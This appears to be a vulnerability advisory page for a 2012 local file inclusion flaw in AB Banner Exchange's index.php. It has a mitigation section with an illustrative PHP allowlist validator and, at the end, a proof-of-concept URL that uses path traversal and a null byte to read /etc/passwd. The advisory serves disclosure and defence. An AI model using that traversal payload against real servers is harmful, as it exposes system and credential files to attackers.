Vendor: AB Banner Exchange
By: Yakir Wizman
CVSS: 7.5 (HIGH)
Vulnerability: Local file inclusion
CWE: 22
Product Name: AB Banner Exchange
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

AB Banner Exchange (index.php page) Local file inclusion

A local file inclusion vulnerability in the index.php page of AB Banner Exchange, a PHP script for running a banner exchange system, allows an attacker to read arbitrary files on the server via a crafted page parameter in the URL.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
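
The following is an added example of that input validation, not code from AB Banner Exchange or from the original advisory. The script's source is not shown on this page, so the vulnerable pattern in the comment, the pages directory and the page names are all assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed vulnerable pattern (the script's real source is not on this page):
//   include 'pages/' . $_GET['page'] . '.php';
// A "../" sequence escapes the directory, and on PHP versions before 5.3.4
// a trailing %00 cut off the appended ".php".

const PAGES_DIR = __DIR__ . '/pages';                      // hypothetical template directory
const ALLOWED_PAGES = ['home', 'signup', 'stats', 'faq'];  // hypothetical page names

/**
 * Map the untrusted "page" value to a file inside PAGES_DIR, or return null.
 */
function resolve_page($requested): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Exact-match allowlist: "../", absolute paths and NUL bytes can never match.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    $base = realpath(PAGES_DIR);
    // Defence in depth: the resolved file must exist and sit under PAGES_DIR
    // (catches a symlink that points out of the directory).
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

Rejected values are worth logging: a page parameter containing "../" or a NUL byte does not occur in normal navigation.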

Exploit-DB raw data:

-----------------------------------------------------------
AB Banner Exchange (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.abscripts.com/ab-banner-exchange/
Demo - http://www.scripts-demo.com/ab-banner-exchange/
ISRAEL
-----------------------------------------------------------
       Author will not be responsible for any damage.
-----------------------------------------------------------

About the Application
-----------------------------------------------------------
AB Banner Exchange is an advanced PHP script for running your own banner exchange system.


Proof Of Concept
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL	: http://server/ab-banner-exchange/index.php?page=../../../../../../../../../../etc/passwd%00